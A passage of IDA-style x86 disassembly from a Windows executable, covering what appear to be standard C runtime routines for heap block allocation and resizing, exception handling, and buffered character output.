and [eax+8], edx
mov eax, ebx
loc_4063C5: ; CODE XREF: sub_4062C4+5Fj
pop edi
pop esi
pop ebx
leave
retn
sub_4062C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4063CA proc near ; CODE XREF: sub_40DE1D+77p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_40656C
test bl, 1
jnz loc_406565
add ebx, ecx
cmp esi, ebx
jg loc_406565
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_40643F
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_40643F: ; CODE XREF: sub_4063CA+6Dj
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_40648A
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_40646B
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_40648A
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_40648A
; ---------------------------------------------------------------------------
loc_40646B: ; CODE XREF: sub_4063CA+85j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_40648A
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_40648A: ; CODE XREF: sub_4063CA+7Bj
; sub_4063CA+98j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_406553
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_4064C4
push 3Fh
pop edi
loc_4064C4: ; CODE XREF: sub_4063CA+F5j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_406541
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_406518
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_406510
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_406510: ; CODE XREF: sub_4063CA+136j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_406538
; ---------------------------------------------------------------------------
loc_406518: ; CODE XREF: sub_4063CA+130j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_40652E
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_40652E: ; CODE XREF: sub_4063CA+152j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_406538: ; CODE XREF: sub_4063CA+14Cj
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_406541: ; CODE XREF: sub_4063CA+11Ej
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_406556
; ---------------------------------------------------------------------------
loc_406553: ; CODE XREF: sub_4063CA+DEj
mov edx, [ebp+arg_4]
loc_406556: ; CODE XREF: sub_4063CA+187j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_4066A1
; ---------------------------------------------------------------------------
loc_406565: ; CODE XREF: sub_4063CA+50j
; sub_4063CA+5Aj
xor eax, eax
jmp loc_4066A4
; ---------------------------------------------------------------------------
loc_40656C: ; CODE XREF: sub_4063CA+47j
jge loc_4066A1
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_406597
push 3Fh
pop esi
loc_406597: ; CODE XREF: sub_4063CA+1C8j
test byte ptr [ebp+var_4], 1
jnz loc_406621
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_4065B0
push 3Fh
pop esi
loc_4065B0: ; CODE XREF: sub_4063CA+1E1j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_4065FA
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_4065DB
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_4065F7
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_4065F7
; ---------------------------------------------------------------------------
loc_4065DB: ; CODE XREF: sub_4063CA+1F6j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_4065F7
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_4065F7: ; CODE XREF: sub_4063CA+208j
; sub_4063CA+20Fj ...
mov ebx, [ebp+arg_4]
loc_4065FA: ; CODE XREF: sub_4063CA+1ECj
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_406621
push 3Fh
pop esi
loc_406621: ; CODE XREF: sub_4063CA+1D1j
; sub_4063CA+252j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_406698
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_40666F
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_406667
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_406667: ; CODE XREF: sub_4063CA+28Dj
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_40668F
; ---------------------------------------------------------------------------
loc_40666F: ; CODE XREF: sub_4063CA+287j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_406685
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_406685: ; CODE XREF: sub_4063CA+2A9j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_40668F: ; CODE XREF: sub_4063CA+2A3j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_406698: ; CODE XREF: sub_4063CA+275j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_4066A1: ; CODE XREF: sub_4063CA+196j
; sub_4063CA:loc_40656Cj
xor eax, eax
inc eax
loc_4066A4: ; CODE XREF: sub_4063CA+19Dj
pop edi
pop esi
pop ebx
leave
retn
sub_4063CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4066A9 proc near ; CODE XREF: sub_403A5D+28p
; sub_40DCFF+88p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_43695C
mov ecx, [ebp+arg_0]
imul eax, 14h
add eax, dword_436960
add ecx, 17h
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
push ebx
dec ecx
cmp ecx, 20h
push esi
push edi
jge short loc_4066E0
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_4066ED
; ---------------------------------------------------------------------------
loc_4066E0: ; CODE XREF: sub_4066A9+2Aj
add ecx, 0FFFFFFE0h
or edx, 0FFFFFFFFh
xor esi, esi
shr edx, cl
mov [ebp+var_8], edx
loc_4066ED: ; CODE XREF: sub_4066A9+35j
mov ecx, dword_436968
mov ebx, ecx
jmp short loc_406708
; ---------------------------------------------------------------------------
loc_4066F7: ; CODE XREF: sub_4066A9+64j
mov edx, [ebx+4]
mov edi, [ebx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_40670F
add ebx, 14h
loc_406708: ; CODE XREF: sub_4066A9+4Cj
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_4066F7
loc_40670F: ; CODE XREF: sub_4066A9+5Aj
cmp ebx, eax
jnz short loc_406792
mov ebx, dword_436960
jmp short loc_40672C
; ---------------------------------------------------------------------------
loc_40671B: ; CODE XREF: sub_4066A9+88j
mov edx, [ebx+4]
mov edi, [ebx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_406733
add ebx, 14h
loc_40672C: ; CODE XREF: sub_4066A9+70j
cmp ebx, ecx
mov [ebp+arg_0], ebx
jb short loc_40671B
loc_406733: ; CODE XREF: sub_4066A9+7Ej
cmp ebx, ecx
jnz short loc_406792
jmp short loc_406745
; ---------------------------------------------------------------------------
loc_406739: ; CODE XREF: sub_4066A9+9Ej
cmp dword ptr [ebx+8], 0
jnz short loc_406749
add ebx, 14h
mov [ebp+arg_0], ebx
loc_406745: ; CODE XREF: sub_4066A9+8Ej
cmp ebx, eax
jb short loc_406739
loc_406749: ; CODE XREF: sub_4066A9+94j
cmp ebx, eax
jnz short loc_40677E
mov ebx, dword_436960
jmp short loc_40675E
; ---------------------------------------------------------------------------
loc_406755: ; CODE XREF: sub_4066A9+BAj
cmp dword ptr [ebx+8], 0
jnz short loc_406765
add ebx, 14h
loc_40675E: ; CODE XREF: sub_4066A9+AAj
cmp ebx, ecx
mov [ebp+arg_0], ebx
jb short loc_406755
loc_406765: ; CODE XREF: sub_4066A9+B0j
cmp ebx, ecx
jnz short loc_40677E
call sub_406214
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jnz short loc_40677E
loc_406777: ; CODE XREF: sub_4066A9+E7j
xor eax, eax
jmp loc_406987
; ---------------------------------------------------------------------------
loc_40677E: ; CODE XREF: sub_4066A9+A2j
; sub_4066A9+BEj ...
push ebx
call sub_4062C4
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_406777
loc_406792: ; CODE XREF: sub_4066A9+68j
; sub_4066A9+8Cj
mov dword_436968, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_4067B9
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4067E2
loc_4067B9: ; CODE XREF: sub_4066A9+FAj
and [ebp+var_4], 0
mov edx, [eax+0C4h]
lea ecx, [eax+44h]
loc_4067C6: ; CODE XREF: sub_4066A9+134j
mov edi, [ecx]
and edx, [ebp+var_8]
and edi, esi
or edx, edi
jnz short loc_4067DF
inc [ebp+var_4]
mov edx, [ecx+84h]
add ecx, 4
jmp short loc_4067C6
; ---------------------------------------------------------------------------
loc_4067DF: ; CODE XREF: sub_4066A9+126j
mov edx, [ebp+var_4]
loc_4067E2: ; CODE XREF: sub_4066A9+10Ej
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_406810
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_406810
; ---------------------------------------------------------------------------
loc_40680D: ; CODE XREF: sub_4066A9+169j
add ecx, ecx
inc edi
loc_406810: ; CODE XREF: sub_4066A9+153j
; sub_4066A9+162j
test ecx, ecx
jge short loc_40680D
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_406831
push 3Fh
pop esi
loc_406831: ; CODE XREF: sub_4066A9+183j
cmp esi, edi
jz loc_40693A
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_40689D
cmp edi, 20h
mov ebx, 80000000h
jge short loc_406871
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_40689A
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_40689D
; ---------------------------------------------------------------------------
loc_406871: ; CODE XREF: sub_4066A9+1A0j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_40689A
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_40689D
; ---------------------------------------------------------------------------
loc_40689A: ; CODE XREF: sub_4066A9+1BCj
; sub_4066A9+1E4j
mov ebx, [ebp+arg_0]
loc_40689D: ; CODE XREF: sub_4066A9+196j
; sub_4066A9+1C6j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_406946
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_406937
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_40690E
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_4068FC
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_4068FC: ; CODE XREF: sub_4066A9+246j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_406937
; ---------------------------------------------------------------------------
loc_40690E: ; CODE XREF: sub_4066A9+240j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_406921
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_406921: ; CODE XREF: sub_4066A9+269j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_406937: ; CODE XREF: sub_4066A9+22Ej
; sub_4066A9+263j
mov ecx, [ebp+var_8]
loc_40693A: ; CODE XREF: sub_4066A9+18Aj
test ecx, ecx
jz short loc_406949
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_406949
; ---------------------------------------------------------------------------
loc_406946: ; CODE XREF: sub_4066A9+20Aj
mov ecx, [ebp+var_8]
loc_406949: ; CODE XREF: sub_4066A9+293j
; sub_4066A9+29Bj
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_40697F
cmp ebx, dword_427ACC
jnz short loc_40697F
mov ecx, [ebp+var_4]
cmp ecx, dword_436970
jnz short loc_40697F
and dword_427ACC, 0
loc_40697F: ; CODE XREF: sub_4066A9+2BAj
; sub_4066A9+2C2j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_406987: ; CODE XREF: sub_4066A9+D0j
pop edi
pop esi
pop ebx
leave
retn
sub_4066A9 endp
; [00000045 BYTES: COLLAPSED FUNCTION __SEH_prolog4. PRESS KEYPAD "+" TO EXPAND]
; [00000014 BYTES: COLLAPSED FUNCTION __SEH_epilog4. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_4069F0 proc near ; DATA XREF: __SEH_prolog4o
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 00408A81 SIZE 00000019 BYTES
sub esp, 14h
push ebx
mov ebx, [esp+18h+arg_4]
push ebp
push esi
mov esi, [ebx+8]
xor esi, dword_423064
push edi
mov eax, [esi]
cmp eax, 0FFFFFFFEh
mov [esp+24h+var_11], 0
mov [esp+24h+var_C], 1
lea edi, [ebx+10h]
jz short loc_406A28
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_402ADC
loc_406A28: ; CODE XREF: sub_4069F0+29j
mov ecx, [esi+0Ch]
mov eax, [esi+8]
add ecx, edi
xor ecx, [eax+edi]
call sub_402ADC
mov eax, [esp+24h+arg_0]
test byte ptr [eax+4], 66h
jnz loc_406B65
mov ebp, [ebx+0Ch]
cmp ebp, 0FFFFFFFEh
mov ecx, [esp+24h+arg_8]
lea edx, [esp+24h+var_8]
mov [esp+24h+var_8], eax
mov [esp+24h+var_4], ecx
mov [ebx-4], edx
jz short loc_406ABF
loc_406A61: ; CODE XREF: sub_4069F0+A2j
lea eax, [ebp+ebp*2+0]
mov ecx, [esi+eax*4+14h]
test ecx, ecx
lea ebx, [esi+eax*4+10h]
mov eax, [ebx]
mov [esp+24h+var_10], eax
jz short loc_406A8D
mov edx, edi
call sub_408A6A
test eax, eax
mov [esp+24h+var_11], 1
jl short loc_406ACB
jg short loc_406AD5
mov eax, [esp+24h+var_10]
loc_406A8D: ; CODE XREF: sub_4069F0+85j
cmp eax, 0FFFFFFFEh
mov ebp, eax
jnz short loc_406A61
cmp [esp+24h+var_11], 0
jz short loc_406ABF
loc_406A9B: ; CODE XREF: sub_4069F0+E3j
; sub_4069F0+191j
mov eax, [esi]
cmp eax, 0FFFFFFFEh
jz short loc_406AAF
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_402ADC
loc_406AAF: ; CODE XREF: sub_4069F0+B0j
mov ecx, [esi+0Ch]
mov eax, [esi+8]
add ecx, edi
xor ecx, [eax+edi]
call sub_402ADC
loc_406ABF: ; CODE XREF: sub_4069F0+6Fj
; sub_4069F0+A9j ...
mov eax, [esp+24h+var_C]
pop edi
pop esi
pop ebp
pop ebx
add esp, 14h
retn
; ---------------------------------------------------------------------------
loc_406ACB: ; CODE XREF: sub_4069F0+95j
mov [esp+24h+var_C], 0
jmp short loc_406A9B
; ---------------------------------------------------------------------------
loc_406AD5: ; CODE XREF: sub_4069F0+97j
mov ecx, [esp+24h+arg_0]
cmp dword ptr [ecx], 0E06D7363h
jnz short loc_406B0B
cmp ds:off_41DC2C, 0
jz short loc_406B0B
push offset off_41DC2C
call sub_40D002
add esp, 4
test eax, eax
jz short loc_406B0B
mov edx, [esp+24h+arg_0]
push 1
push edx
call ds:off_41DC2C
add esp, 8
loc_406B0B: ; CODE XREF: sub_4069F0+EFj
; sub_4069F0+F8j ...
mov ecx, [esp+24h+arg_4]
call sub_408A9A
mov eax, [esp+24h+arg_4]
cmp [eax+0Ch], ebp
jz short loc_406B30
push offset dword_423064
push edi
mov edx, ebp
mov ecx, eax
call sub_408AB4
mov eax, [esp+24h+arg_4]
loc_406B30: ; CODE XREF: sub_4069F0+12Bj
mov ecx, [esp+24h+var_10]
mov [eax+0Ch], ecx
mov eax, [esi]
cmp eax, 0FFFFFFFEh
jz short loc_406B4B
mov ecx, [esi+4]
add ecx, edi
xor ecx, [eax+edi]
call sub_402ADC
loc_406B4B: ; CODE XREF: sub_4069F0+14Cj
mov ecx, [esi+0Ch]
mov edx, [esi+8]
add ecx, edi
xor ecx, [edx+edi]
call sub_402ADC
mov ecx, [ebx+8]
mov edx, edi
jmp loc_408A81
; ---------------------------------------------------------------------------
loc_406B65: ; CODE XREF: sub_4069F0+50j
cmp dword ptr [ebx+0Ch], 0FFFFFFFEh
jz loc_406ABF
push offset dword_423064
push edi
mov ecx, ebx
mov edx, 0FFFFFFFEh
call sub_408AB4
jmp loc_406A9B
sub_4069F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406B86 proc near ; CODE XREF: sub_402EBA+9Fp
; sub_403481+6Ep ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_4]
push esi
call sub_408DD0
mov [ebp+arg_4], eax
mov eax, [esi+0Ch]
test al, 82h
pop ecx
jnz short loc_406BB6
call sub_405B83
mov dword ptr [eax], 9
loc_406BAA: ; CODE XREF: sub_406B86+3Fj
or dword ptr [esi+0Ch], 20h
or eax, 0FFFFFFFFh
jmp loc_406CE3
; ---------------------------------------------------------------------------
loc_406BB6: ; CODE XREF: sub_406B86+17j
test al, 40h
jz short loc_406BC7
call sub_405B83
mov dword ptr [eax], 22h
jmp short loc_406BAA
; ---------------------------------------------------------------------------
loc_406BC7: ; CODE XREF: sub_406B86+32j
push ebx
xor ebx, ebx
test al, 1
jz short loc_406BE4
test al, 10h
mov [esi+4], ebx
jz loc_406C5E
mov ecx, [esi+8]
and eax, 0FFFFFFFEh
mov [esi], ecx
mov [esi+0Ch], eax
loc_406BE4: ; CODE XREF: sub_406B86+46j
mov eax, [esi+0Ch]
and eax, 0FFFFFFEFh
or eax, 2
test ax, 10Ch
mov [esi+0Ch], eax
mov [esi+4], ebx
mov [ebp+var_4], ebx
jnz short loc_406C28
call sub_408434
add eax, 20h
cmp esi, eax
jz short loc_406C14
call sub_408434
add eax, 40h
cmp esi, eax
jnz short loc_406C21
loc_406C14: ; CODE XREF: sub_406B86+80j
push [ebp+arg_4]
call sub_40D8F0
test eax, eax
pop ecx
jnz short loc_406C28
loc_406C21: ; CODE XREF: sub_406B86+8Cj
push esi
call sub_40D8AC
pop ecx
loc_406C28: ; CODE XREF: sub_406B86+74j
; sub_406B86+99j
test word ptr [esi+0Ch], 108h
push edi
jz loc_406CB5
mov eax, [esi+8]
mov edi, [esi]
lea ecx, [eax+1]
mov [esi], ecx
mov ecx, [esi+18h]
sub edi, eax
dec ecx
cmp edi, ebx
mov [esi+4], ecx
jle short loc_406C69
push edi
push eax
push [ebp+arg_4]
call sub_40D7D0
add esp, 0Ch
mov [ebp+var_4], eax
jmp short loc_406CAB
; ---------------------------------------------------------------------------
loc_406C5E: ; CODE XREF: sub_406B86+4Dj
or eax, 20h
mov [esi+0Ch], eax
or eax, 0FFFFFFFFh
jmp short loc_406CE2
; ---------------------------------------------------------------------------
loc_406C69: ; CODE XREF: sub_406B86+C4j
mov ecx, [ebp+arg_4]
cmp ecx, 0FFFFFFFFh
jz short loc_406C8C
cmp ecx, 0FFFFFFFEh
jz short loc_406C8C
mov eax, ecx
and eax, 1Fh
imul eax, 28h
mov edx, ecx
sar edx, 5
add eax, dword_435820[edx*4]
jmp short loc_406C91
; ---------------------------------------------------------------------------
loc_406C8C: ; CODE XREF: sub_406B86+E9j
; sub_406B86+EEj
mov eax, offset dword_423BD0
loc_406C91: ; CODE XREF: sub_406B86+104j
test byte ptr [eax+4], 20h
jz short loc_406CAB
push 2
push ebx
push ebx
push ecx
call sub_40D0F1
and eax, edx
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_406CD0
loc_406CAB: ; CODE XREF: sub_406B86+D6j
; sub_406B86+10Fj
mov eax, [esi+8]
mov cl, byte ptr [ebp+arg_0]
mov [eax], cl
jmp short loc_406CCB
; ---------------------------------------------------------------------------
loc_406CB5: ; CODE XREF: sub_406B86+A9j
xor edi, edi
inc edi
push edi
lea eax, [ebp+arg_0]
push eax
push [ebp+arg_4]
call sub_40D7D0
add esp, 0Ch
mov [ebp+var_4], eax
loc_406CCB: ; CODE XREF: sub_406B86+12Dj
cmp [ebp+var_4], edi
jz short loc_406CD9
loc_406CD0: ; CODE XREF: sub_406B86+123j
or dword ptr [esi+0Ch], 20h
or eax, 0FFFFFFFFh
jmp short loc_406CE1
; ---------------------------------------------------------------------------
loc_406CD9: ; CODE XREF: sub_406B86+148j
mov eax, [ebp+arg_0]
and eax, 0FFh
loc_406CE1: ; CODE XREF: sub_406B86+151j
pop edi
loc_406CE2: ; CODE XREF: sub_406B86+E1j
pop ebx
loc_406CE3: ; CODE XREF: sub_406B86+2Bj
pop esi
leave
retn
sub_406B86 endp
; =============== S U B R O U T I N E =======================================
sub_406CE6 proc near ; CODE XREF: sub_406D19+11p
; sub_406D3D+22p ...
test byte ptr [ecx+0Ch], 40h
jz short loc_406CF2
cmp dword ptr [ecx+8], 0
jz short loc_406D16
loc_406CF2: ; CODE XREF: sub_406CE6+4j
dec dword ptr [ecx+4]
js short loc_406D02
mov edx, [ecx]
mov [edx], al
inc dword ptr [ecx]
movzx eax, al
jmp short loc_406D0E
; ---------------------------------------------------------------------------
loc_406D02: ; CODE XREF: sub_406CE6+Fj
movsx eax, al
push ecx
push eax
call sub_406B86
pop ecx
pop ecx
loc_406D0E: ; CODE XREF: sub_406CE6+1Aj
cmp eax, 0FFFFFFFFh
jnz short loc_406D16
or [esi], eax
retn
; ---------------------------------------------------------------------------
loc_406D16: ; CODE XREF: sub_406CE6+Aj
; sub_406CE6+2Bj
inc dword ptr [esi]
retn
sub_406CE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D19 proc near ; CODE XREF: sub_406D87+853p
; sub_406D87+880p ...
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp short loc_406D34
; ---------------------------------------------------------------------------
loc_406D21: ; CODE XREF: sub_406D19+1Fj
mov ecx, [ebp+arg_8]
mov al, [ebp+arg_0]
dec [ebp+arg_4]
call sub_406CE6
cmp dword ptr [esi], 0FFFFFFFFh
jz short loc_406D3A
loc_406D34: ; CODE XREF: sub_406D19+6j
cmp [ebp+arg_4], 0
jg short loc_406D21
loc_406D3A: ; CODE XREF: sub_406D19+19j
pop esi
pop ebp
retn
sub_406D19 endp
; =============== S U B R O U T I N E =======================================
sub_406D3D proc near ; CODE XREF: sub_406D87+867p
; sub_406D87+8CEp ...
arg_0 = dword ptr 4
test byte ptr [edi+0Ch], 40h
push ebx
push esi
mov esi, eax
mov ebx, ecx
jz short loc_406D7D
cmp dword ptr [edi+8], 0
jnz short loc_406D7D
mov eax, [esp+8+arg_0]
add [esi], eax
jmp short loc_406D84
; ---------------------------------------------------------------------------
loc_406D57: ; CODE XREF: sub_406D3D+45j
mov al, [ebx]
dec [esp+8+arg_0]
mov ecx, edi
call sub_406CE6
inc ebx
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_406D7D
call sub_405B83
cmp dword ptr [eax], 2Ah
jnz short loc_406D84
mov ecx, edi
mov al, 3Fh
call sub_406CE6
loc_406D7D: ; CODE XREF: sub_406D3D+Aj
; sub_406D3D+10j ...
cmp [esp+8+arg_0], 0
jg short loc_406D57
loc_406D84: ; CODE XREF: sub_406D3D+18j
; sub_406D3D+35j
pop esi
pop ebx
retn
sub_406D3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=1F8h
sub_406D87 proc near ; CODE XREF: sub_402EBA+80p
; sub_403481+53p ...
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_260 = dword ptr -260h
var_25C = byte ptr -25Ch
var_254 = dword ptr -254h
var_250 = byte ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_244 = dword ptr -244h
var_240 = dword ptr -240h
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_234 = dword ptr -234h
var_230 = byte ptr -230h
var_22F = byte ptr -22Fh
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_211 = byte ptr -211h
